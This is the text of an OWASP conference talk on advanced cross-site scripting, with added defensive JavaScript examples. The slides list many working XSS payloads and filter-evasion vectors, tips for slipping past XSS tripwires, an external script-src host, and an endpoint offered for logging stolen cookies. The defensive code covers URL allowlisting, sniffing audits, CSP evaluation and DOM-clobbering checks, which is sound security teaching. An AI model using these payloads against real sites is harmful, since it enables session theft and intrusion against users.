Advanced XSS - OWASP · 2020-01-17 · 1. Starter: reboiled XSS 2. Course: spicy blacklists &...
Advanced XSS
Nicolas Golubovic
Image courtesy of chanpipat / FreeDigitalPhotos.net
Today's menu
1. Starter: reboiled XSS
2. Course: spicy blacklists & filters
3. Course: sweet content sniffing
4. Course: salty defenses
   a. httpOnly cookies
   b. Content Security Policy (CSP)
   c. XSS Auditor
5. Dessert: tips and tricks
   a. DOM clobbering
6. Cookies?
Reboiled XSS
Image courtesy of picture alliance
Cross-site scripting
<tag>...injection...</tag>
or
<a name="injection">anchor</a>
● the urge to alert(1)
Cross-site scripting
<tag>...<script>alert(1)</script>...</tag>
or
<a name="" onmouseover="alert(1)">anchor</a>
Cross-site scripting
Cross-site scripting
ways to execute scripts?
Script tag
<script>code</script>
<script src=//url></script>
<script src=//url defer></script>
Event handlers
<svg onload=alert(1)>
<input onfocus=alert(1) autofocus>
<img src=x onerror=alert(1)>
...
Pseudo-handler
<a href="javascript:alert(1)">a</a>
<iframe src="javascript:alert(1)"></iframe>
<object data="javascript:alert(1)"> (FF)
...
eval and similar
eval('alert(1)');
setTimeout('alert(1)', 0);
CSS: expression(alert(1)); (IE)
...
XSS
● user-supplied data presented to users
● XSS is mostly a problem of insufficient sanitization
● reflected
● persistent
● DOM-based
Blacklists & filters
Blacklists & filters
(diagram: Request -> Server [urldecode, handle] -> Response)
Problems
● DOM-based XSS
● server-side code does not really "understand" the client side
  ○ browsers do transform the response
  ○ subtle differences between browsers!
Example
● javascript:alert(1) considered evil?
● maybe javascript:alert(1) less so ;-)
Example
● oh, so alert(1) was the problem?
● let's try \u0061\u006c\u0065\u0072\u0074(1)
Yep, it's that ugly
● javascr
ipt:\u0061\u006c\u0065\u0072\u0074(1)
Even more...
● decimal escapes with as many zeroes as you want, e.g. &#0000097; for a
● &colon; and other special entities
● --> & <!-- = valid JavaScript comments
● non-alphanumeric JavaScript
-> hackvertor.co.uk (Gareth Heyes)
...and more...
● feed:javascript:, feed:feed:javascript:, feed:feed... okay you get it (old Firefox versions)
● IE allows for rather interesting vectors: [0x01]javascript:, [0x02]javascript:
-> shazzer.co.uk (Gareth Heyes)
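Added example, not from the talk: the slides above show why a substring blacklist for javascript: fails once the value is entity-decoded and whitespace-stripped the way a browser does it before parsing the URL. The code below performs that normalization first and then allowlists schemes; the allowlist (http, https, mailto), the function names and the sample hrefs are this example's own. The entity decoder is deliberately looser than a real HTML parser (any case, optional semicolon), which can only make the check stricter.

```javascript
// Added example (not from the talk): normalize an href the way a browser does,
// then allowlist schemes, instead of blacklisting the string "javascript:".
// Names (decodeEntities, normalizeHref, isSafeHref, blacklistRejects) and the
// allowlist are this example's own.

// Named references the slides mention; looked up case-insensitively, which
// over-decodes compared with a real HTML parser and so only makes the check stricter.
const NAMED_REFS = { colon: ":", tab: "\t", newline: "\n", amp: "&", lt: "<", gt: ">" };

function decodeEntities(s) {
  // &#106; / &#0000106; (decimal, any number of leading zeroes), &#x6A; (hex),
  // &colon; (named); the trailing semicolon is optional.
  return s.replace(/&(#x[0-9a-f]+|#[0-9]+|[a-z]+);?/gi, (match, body) => {
    if (body[0] === "#") {
      const hex = body[1].toLowerCase() === "x";
      const cp = parseInt(hex ? body.slice(2) : body.slice(1), hex ? 16 : 10);
      return cp <= 0x10ffff ? String.fromCodePoint(cp) : match;
    }
    const named = NAMED_REFS[body.toLowerCase()];
    return named === undefined ? match : named;
  });
}

function normalizeHref(raw) {
  // WHATWG URL parsing strips leading/trailing C0 controls and spaces and
  // removes ASCII tab, LF and CR anywhere, so "java\tscript:" becomes "javascript:".
  return decodeEntities(String(raw))
    .replace(/^[\x00-\x20]+|[\x00-\x20]+$/g, "")
    .replace(/[\t\n\r]/g, "");
}

const ALLOWED_SCHEMES = new Set(["http", "https", "mailto"]);

function isSafeHref(raw) {
  const href = normalizeHref(raw);
  // Browsers differ on what they do with leftover control characters
  // (the IE vectors on the slide); refuse them rather than reason about it.
  if (/[\x00-\x1f\x7f]/.test(href)) return false;
  const scheme = /^([a-z][a-z0-9+.-]*):/i.exec(href);
  if (!scheme) return true; // no scheme: relative URL on the page's own origin
  return ALLOWED_SCHEMES.has(scheme[1].toLowerCase());
}

// The blacklist the slides take apart: a substring test on the raw value.
function blacklistRejects(raw) {
  return /javascript:/i.test(String(raw));
}

// Constructed inputs: the obfuscations from the slides.
const SAMPLES = [
  "javascript:alert(1)",
  "java\tscript:alert(1)",
  "&#x6A;avascript:alert(1)",
  "&#0000106;avascript&colon;alert(1)",
  "\u0001javascript:alert(1)",
  "feed:javascript:alert(1)",
];

function compareChecks() {
  // Per sample: did the blacklist reject it, did the allowlist reject it?
  // Every sample is unsafe; only the allowlist column is true throughout.
  return SAMPLES.map((href) => ({
    href,
    blacklist: blacklistRejects(href),
    allowlist: !isSafeHref(href),
  }));
}
```

The point of normalizing before checking is that the check sees the same string the browser's URL parser will see; the control-character refusal is the conservative answer to the "subtle differences between browsers" slide.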
...and SVG
<svg><script><![CDATA[\]]><![CDATA[u0061]]><![CDATA[lert]]>(1)</script>
<svg><script>a<!>l<!>e<!>r<!>t<!>(<!>1<!>)</script>
(vectors by Mario Heiderich)
Get the point?
Image courtesy of imagerymajestic / FreeDigitalPhotos.net
Content sniffing
Image courtesy of photostock / FreeDigitalPhotos.net
Content sniffing
● browsers love markup
● they try to recognize it where they can -> "content sniffing"
● IE behaved nastily
  ○ today hidden in "compatibility view"
● want up-to-date results?
  ○ github.com/qll/DoesItSniff
● another story: charset sniffing
Chrome 27 sniffs...
● when MIME-type is
  ○ unknown/unknown
  ○ application/unknown
  ○ foo or basically anything without a /
● when there is no MIME-type
● X-Content-Type-Options: nosniff works
Firefox 21 sniffs...
● when MIME-type is
  ○ foo or basically anything without a /
    ■ even when asked not to
● when there is no MIME-type
● X-Content-Type-Options: nosniff works sometimes
IE 10 sniffs...
● when MIME-type is
  ○ application/octet-stream
  ○ in compatibility view: text/plain
● when there is no MIME-type
  ○ even when asked not to
● X-Content-Type-Options: nosniff works sometimes
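Added example, not from the talk: the three slides above give the conditions under which Chrome 27, Firefox 21 and IE 10 sniff. auditResponseHeaders below checks a response-header set against exactly those conditions, and uploadResponseHeaders builds headers for user-uploaded files that sidestep them (a type from an allowlist or application/octet-stream, a forced download, nosniff). The function names, the upload allowlist and the sample header sets are constructed for this example.

```javascript
// Added example (not from the talk): audit response headers against the
// sniffing conditions on the Chrome 27 / Firefox 21 / IE 10 slides, and build
// headers for user uploads that avoid them. Function names, the upload type
// allowlist and the sample header sets are this example's own.

// Content-Types that at least one of the three browsers sniffs when served inline.
const SNIFFED_TYPES = {
  "unknown/unknown": "Chrome 27",
  "application/unknown": "Chrome 27",
  "application/octet-stream": "IE 10",
  "text/plain": "IE 10 in compatibility view",
};

function header(headers, name) {
  // Header names are case-insensitive; headers is a plain { name: value } object.
  const key = Object.keys(headers).find((k) => k.toLowerCase() === name);
  return key === undefined ? undefined : String(headers[key]).trim();
}

function auditResponseHeaders(headers) {
  const findings = [];
  const contentType = header(headers, "content-type");
  const nosniff = (header(headers, "x-content-type-options") || "").toLowerCase() === "nosniff";
  const attachment = /^attachment\b/i.test(header(headers, "content-disposition") || "");

  if (!contentType) {
    findings.push("no Content-Type: Chrome 27, Firefox 21 and IE 10 all sniff (IE even with nosniff)");
  } else {
    const type = contentType.split(";")[0].trim().toLowerCase();
    if (!type.includes("/")) {
      findings.push(`Content-Type "${type}" has no "/": Chrome 27 and Firefox 21 sniff (Firefox even with nosniff)`);
    } else if (Object.prototype.hasOwnProperty.call(SNIFFED_TYPES, type) && !attachment) {
      findings.push(`Content-Type "${type}" served inline is sniffed by ${SNIFFED_TYPES[type]}`);
    }
  }
  if (!nosniff) findings.push("X-Content-Type-Options: nosniff is not set");
  return findings;
}

const UPLOAD_TYPES = new Set(["image/png", "image/jpeg", "image/gif", "application/pdf"]);

function uploadResponseHeaders(declaredType, filename) {
  // Never echo a client-declared type: take it from an allowlist or fall back to a
  // type that is never rendered, and force a download so sniffing has nothing to render.
  const lower = String(declaredType).toLowerCase();
  const type = UPLOAD_TYPES.has(lower) ? lower : "application/octet-stream";
  const safeName = String(filename).replace(/[^A-Za-z0-9._-]/g, "_");
  return {
    "Content-Type": type,
    "X-Content-Type-Options": "nosniff",
    "Content-Disposition": `attachment; filename="${safeName}"`,
  };
}

// Constructed sample header sets, as a checker might read them from a scan.
const SAMPLE_RESPONSES = {
  noType: { Server: "example" },
  noSlash: { "Content-Type": "foo" },
  octetInline: { "Content-Type": "application/octet-stream", "X-Content-Type-Options": "nosniff" },
  fine: { "content-type": "image/png", "x-content-type-options": "NoSniff" },
};

function auditAll(responses = SAMPLE_RESPONSES) {
  return Object.fromEntries(
    Object.entries(responses).map(([name, h]) => [name, auditResponseHeaders(h)])
  );
}
```

Note the asymmetry the slides describe: nosniff is honoured reliably only when the server also sends a sensible Content-Type, which is why the audit reports a missing or slash-less type separately from a missing nosniff header.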
Defenses
Defense in Depth?
● regular defenses:
  ○ consistent charset
  ○ HTML-encode in markup
  ○ ...
● multiple layers of defense
● so how good are they?
httpOnly cookies
● more attack surface than stealing cookies
● unreadable for JavaScript / plugins
● really?
● depends :-)
● prior to FF 16: LiveConnect
  html5sec.org/java (Mario Heiderich)
CSP
● ambitious
● eradicates most XSS used today
● silver bullet?
  ○ JSONP
  ○ scripting?
    ■ Zalewski: lcamtuf.coredump.cx/postxss
    ■ Heiderich et al.: "Scriptless Attacks"
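Added example, not from the talk: a small evaluator for the script-src directive of a Content-Security-Policy header, enough to see what a host-allowlist policy lets through compared with a nonce-based one. It handles 'none', 'self', scheme sources, host sources (leading wildcard, optional port and path), 'unsafe-inline' and nonces; hash sources and 'strict-dynamic' are not modelled. The JSONP point from the slide shows up directly: a host on the allowlist is allowed as a whole, including any endpoint on it that echoes a caller-chosen callback name into a script response. parsePolicy, scriptAllowed and the two policies are this example's own.

```javascript
// Added example (not from the talk): evaluate the script-src directive of a
// Content-Security-Policy header for a given script. Handles 'none', 'self',
// scheme sources, host sources (leading wildcard, optional port and path),
// 'unsafe-inline' and nonces; hashes and 'strict-dynamic' are not modelled.
// parsePolicy / scriptAllowed and the policies are this example's own.

function parsePolicy(headerValue) {
  const directives = {};
  for (const part of headerValue.split(";")) {
    const [name, ...values] = part.trim().split(/\s+/).filter(Boolean);
    if (name) directives[name.toLowerCase()] = values;
  }
  return directives;
}

function hostSourceMatches(source, url) {
  let rest = source;
  const schemeMatch = /^([a-z][a-z0-9+.-]*):\/\//i.exec(rest);
  if (schemeMatch) {
    if (url.protocol !== schemeMatch[1].toLowerCase() + ":") return false;
    rest = rest.slice(schemeMatch[0].length);
  }
  const slash = rest.indexOf("/");
  const hostPort = slash < 0 ? rest : rest.slice(0, slash);
  const path = slash < 0 ? "" : rest.slice(slash);
  const [host, port] = hostPort.toLowerCase().split(":");
  if (host.startsWith("*.")) {
    if (!url.hostname.endsWith(host.slice(1))) return false; // "*.cdn.example" -> ".cdn.example"
  } else if (url.hostname !== host) {
    return false;
  }
  if (port && port !== "*") {
    const effective = url.port || (url.protocol === "https:" ? "443" : "80");
    if (effective !== port) return false;
  }
  // CSP path matching: a path ending in "/" is a prefix, anything else is exact.
  if (path && (path.endsWith("/") ? !url.pathname.startsWith(path) : url.pathname !== path)) {
    return false;
  }
  return true;
}

function sourceMatches(source, url, pageOrigin) {
  if (source === "'self'") return url.origin === pageOrigin;
  if (source.startsWith("'")) return false; // 'none', 'unsafe-inline', nonces never match a URL
  if (source === "*") return url.protocol === "http:" || url.protocol === "https:";
  if (/^[a-z][a-z0-9+.-]*:$/i.test(source)) return url.protocol === source.toLowerCase();
  return hostSourceMatches(source, url);
}

// Is a script allowed? Either an external one (url) or an inline one (inline: true,
// optionally carrying a nonce attribute).
function scriptAllowed(policy, { pageOrigin, url = null, inline = false, nonce = null }) {
  const directives = parsePolicy(policy);
  const sources = directives["script-src"] || directives["default-src"];
  if (!sources) return true; // no applicable directive: unrestricted
  const nonces = sources.filter((s) => /^'nonce-.+'$/.test(s)).map((s) => s.slice(7, -1));
  if (nonce !== null && nonces.includes(nonce)) return true;
  if (inline) {
    // A nonce source in the directive switches 'unsafe-inline' off (CSP level 2).
    return sources.includes("'unsafe-inline'") && nonces.length === 0;
  }
  return sources.some((s) => sourceMatches(s, new URL(url), pageOrigin));
}

// Constructed policies for one page origin: a host allowlist and a nonce-based one.
const PAGE_ORIGIN = "https://app.example";
const HOST_POLICY = "default-src 'self'; script-src 'self' https://api.example.com https://*.cdn.example";
const NONCE_POLICY = "default-src 'self'; script-src 'nonce-d3b07384d113' 'self'";
```

With HOST_POLICY, every script on api.example.com is allowed, so a JSONP endpoint there turns into a way to run a caller-named function; NONCE_POLICY allows only scripts the server itself marked, which is the design the slide's "silver bullet?" question points towards.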
XSS Auditor
● XSS filter in Chrome
● aims to make reflected XSS harder
● compares URL to HTTP response body
● if matches are found they will be sanitized
● has been broken several times
● can be used for an attack
  ○ selectively disable scripts
Tips and tricks
Tips and tricks
<script>a = '</script><svg onload=alert(1)>';</script>
What will happen? -> it will (the alert fires)
-> </script> takes precedence
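Added example, not from the talk: the HTML tokenizer decides where a script element ends before any JavaScript is parsed, so a '</script>' inside a JS string literal still closes the element. scriptBodyEnd below applies that rule to the slide's snippet to show the truncation, and jsonForScript shows the usual fix when server data is embedded in an inline script: escape <, > and & (and the U+2028/U+2029 line terminators) inside the JSON, which leaves the decoded value unchanged. The function names and the sample HTML are this example's own.

```javascript
// Added example (not from the talk): where the HTML tokenizer ends a <script>
// element, and how to embed server data in an inline script so user-controlled
// content cannot end it early. Names and the sample HTML are this example's own.

function scriptBodyEnd(html, from) {
  // Script data state: the element ends at the first "</script" (ASCII
  // case-insensitive) followed by whitespace, "/" or ">". JavaScript string
  // delimiters and comments are invisible at this stage.
  const re = /<\/script(?=[\s/>])/gi;
  re.lastIndex = from;
  const match = re.exec(html);
  return match ? match.index : -1;
}

function inlineScriptBody(html) {
  // Body of the first <script> element, as the tokenizer hands it to the JS engine.
  const open = html.indexOf("<script>");
  if (open < 0) return null;
  const start = open + "<script>".length;
  const end = scriptBodyEnd(html, start);
  return end < 0 ? null : html.slice(start, end);
}

function jsonForScript(value) {
  // JSON.stringify output is valid JavaScript, but "</" can still end the element
  // and "<!--" can change tokenizer state; U+2028/U+2029 are JS line terminators.
  // JSON.stringify only ever emits these inside string literals, where \uXXXX
  // escapes are legal, so the decoded value is unchanged.
  return JSON.stringify(value)
    .replace(/</g, "\\u003c")
    .replace(/>/g, "\\u003e")
    .replace(/&/g, "\\u0026")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
}

// Constructed: the slide's value ends up in a JS string literal, first as-is,
// then through jsonForScript.
const UNTRUSTED = "</script><svg onload=alert(1)>";
const UNSAFE_HTML = "<script>a = '" + UNTRUSTED + "';</script>";
const SAFE_HTML = "<script>a = " + jsonForScript(UNTRUSTED) + ";</script>";

function scriptDemo() {
  return {
    unsafeBody: inlineScriptBody(UNSAFE_HTML), // "a = '": the rest became markup
    safeBody: inlineScriptBody(SAFE_HTML),     // the whole assignment survives
    roundTrip: JSON.parse(jsonForScript(UNTRUSTED)) === UNTRUSTED,
  };
}
```

Escaping at the JSON layer rather than HTML-encoding the value is what keeps the script correct: an HTML-encoded string would reach the JS engine still encoded, because entities are not decoded inside script data.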
Tips and tricks
● short vectors with arbitrary code:
  ○ <svg onload=eval(URL) #\u2029alert(1)
    ■ Chrome, IE, (Opera)
    ■ Gareth Heyes & Stefano Di Paola
  ○ <svg onload=eval(window.name)
  ○ <svg onload=eval(location.hash.slice(1))
  ○ <script src=//ø.pw></script> #alert(1)
    ■ kudos to Mario Heiderich for the domain
● without braces:
  ○ location=name
Payload lifetime
● payload dies when the user navigates away :-(
● even on same-origin navigation
● ideas of Heiderich & Kotowicz
  ○ iceqll.eu/poc/persistent.js
    ■ 100% x 100% iframe
    ■ uses history.pushState / onpopstate
XSS tripwires
● be careful, tripwires are fashionable
  ○ don't test with alert(1)
  ○ use anti-sandbox tricks
    ■ delete alert;alert(1)
    ■ FF: Components.lookupMethod(window, 'alert')(1)
  ○ be creative!
DOM clobbering?
Access forms via their name:
<form name=a>content</form>
> document.a.innerHTML
"content"
DOM clobbering?
What now?
<form name=querySelector></form>
> document.querySelector
<form name=querySelector></form>
DOM clobbering!
Consider this:
<div id=a></div>
<form name=querySelector></form>
<script>
var a = document.querySelector('#a');
a.innerHTML = 'test';
</script>
DOM clobbering!
● <img name=body>
● <form name=head>
● <iframe name=whatever></iframe>
● <form name=body><input name=firstChild> for document.body.firstChild
● ...
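Added example, not from the talk: the slides show that a named form or image shadows document.querySelector, document.body and similar members, so the script on the previous slide ends up calling a form element. The code below resolves such members from the prototype chain instead (in a browser: Document.prototype / HTMLDocument.prototype, reached through Object.getPrototypeOf(document)), reports which ones are shadowed, and calls the real method. Because this runs in Node, a constructed FakeDocument stands in for document and simulateClobber stands in for what <form name=querySelector> does; both, and the function names, are this example's own.

```javascript
// Added example (not from the talk): detect members of `document` shadowed by
// named elements and reach the real ones through the prototype chain. In a
// browser pass `document` (its chain leads to HTMLDocument.prototype and
// Document.prototype); here a constructed FakeDocument stands in, and
// simulateClobber stands in for the effect of <form name=...> / <img name=...>.
// All names are this example's own.

function lookupDescriptor(obj, name) {
  for (let o = obj; o !== null; o = Object.getPrototypeOf(o)) {
    const d = Object.getOwnPropertyDescriptor(o, name);
    if (d) return d;
  }
  return undefined;
}

function builtinValue(doc, name) {
  // Start at the prototype, so whatever a named element put on the instance is skipped.
  const d = lookupDescriptor(Object.getPrototypeOf(doc), name);
  if (!d) throw new Error(`${name} is not defined on the document's prototype chain`);
  return d.get ? d.get.call(doc) : d.value;
}

function clobberedMembers(doc, names) {
  // A member is clobbered when `doc[name]` does not yield what the prototype yields.
  return names.filter((name) => doc[name] !== builtinValue(doc, name));
}

function safeCall(doc, method, ...args) {
  // document.querySelector('#a') written so that a <form name=querySelector> cannot intercept it.
  return builtinValue(doc, method).call(doc, ...args);
}

// Constructed stand-in for `document`: the method and the accessor live on the
// prototype, as they do for the real Document interface.
class FakeDocument {
  constructor() {
    this._body = { tagName: "BODY" };
    this._byId = { a: { tagName: "DIV", id: "a", innerHTML: "" } };
  }
  get body() { return this._body; }
  querySelector(selector) {
    const m = /^#([\w-]+)$/.exec(selector);
    return (m && this._byId[m[1]]) || null;
  }
}

function simulateClobber(doc, name, tagName) {
  // Named elements become properties of the document object itself and take
  // precedence over the built-ins; an own data property has the same effect here.
  Object.defineProperty(doc, name, { value: { tagName, name }, configurable: true });
  return doc;
}

function clobberDemo() {
  const doc = new FakeDocument();
  simulateClobber(doc, "querySelector", "FORM");
  simulateClobber(doc, "body", "IMG");
  return {
    clobbered: clobberedMembers(doc, ["querySelector", "body"]),
    naive: typeof doc.querySelector,           // "object": the slide's a.innerHTML then throws
    viaPrototype: safeCall(doc, "querySelector", "#a").id,
    realBody: builtinValue(doc, "body").tagName,
  };
}
```

The same check works as a runtime tripwire in page code: calling clobberedMembers(document, ['querySelector', 'body', 'head']) at load time and logging a non-empty result reports injected named markup before anything relies on those members.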
Thank you
Questions?
Let the fun begin
alertme.iceqll.eu/1
You can log stolen cookies and stuff here: http://l:[email protected]/
Slides: iceqll.eu/talks/advanced_xss
Resources
● Michal Zalewski: The Tangled Web, lcamtuf.coredump.cx, Browser Security Handbook
● Publications by Mario Heiderich et al.
● Mario Heiderich: html5sec.org
● @garethheyes: thespanner.co.uk
● @kkotowicz: blog.kotowicz.net
● @wisecwisec: code.google.com/p/domxsswiki